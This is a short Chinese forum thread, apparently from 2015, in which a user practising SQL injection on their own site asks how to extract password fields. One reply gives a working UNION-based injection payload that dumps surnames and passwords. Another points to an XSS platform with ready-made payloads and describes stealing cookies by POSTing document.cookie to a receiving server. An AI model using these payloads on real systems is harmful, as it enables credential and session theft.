这是一个创建于 3365 天前的主题,其中的信息可能已经有所发展或是发生改变。
我正在学习SQL注入
自建的网站里的查询语句是:
SELECT name, surname, username, passwd, is_admin FROM users WHERE username='***********';
星号是输入内容,
但是不管怎样出错他都只会返回username,
我可以不断尝试拿到不同的username,
但是怎样能把passwd放到username里返回呢?
我想的是类似于构造出
SELECT name, surname, passwd, username, is_admin FROM users WHERE username='某用户名';
但试了不同的组合, 都无法成功. 不知道应该怎样构造语句.
Thanks in advance!
第 1 条附言 · 2015-02-25 03:00:49 +08:00
已解决
 |
1
mhycy 2015-02-25 02:05:12 +08:00
你想做啥。。。。囧
|
 |
2
typcn 2015-02-25 02:07:11 +08:00
盲注?借助工具吧
|
 |
5
sandtears 2015-02-25 02:13:28 +08:00
额。。 不是盲注的话,你得给大家看一下网页显示的源码吧。。
|
 |
7
MrGba2z OP |
|
8
mhycy 2015-02-25 02:16:48 +08:00
报错的是语句,passwd都没查出来怎么返回?
|
|
9
MrGba2z OP @mhycy
-- Users schema CREATE TABLE users( id INTEGER PRIMARY KEY NOT NULL, name TEXT NOT NULL, surname TEXT NOT NULL, username TEXT NOT NULL, passwd TEXT NOT NULL, is_admin BOOLEAN NOT NULL DEFAULT 'f' ); |
 |
10
RIcter 2015-02-25 03:35:20 +08:00 via iPad
刚睡醒看到已经解决了…
-- -1' union select password from xxx# |
|
11
RIcter 2015-02-25 09:38:46 +08:00  1
@RIcter 忘记 limit 0,1 了,完整 payload:
-1' union select concat(surname, 0x3a, passwd) from users limit 0,1# |
|
12
MrGba2z OP |
|
13
RIcter 2015-02-25 10:48:34 +08:00
有一种平台叫做 XSS 平台,比如这个: http://xssnow.com/index.php
里面有现成可利用的 payload 可以获取 Cookie。 以至于远离,大抵是这样: 先获取 Cookie:document.cookie 然后转义,POST Cookie 的内容到一个接收端,接受端获取后存入数据库。 |
 |
15
kslr 2015-02-25 10:52:20 +08:00
|
|
16
MrGba2z OP |
Select Language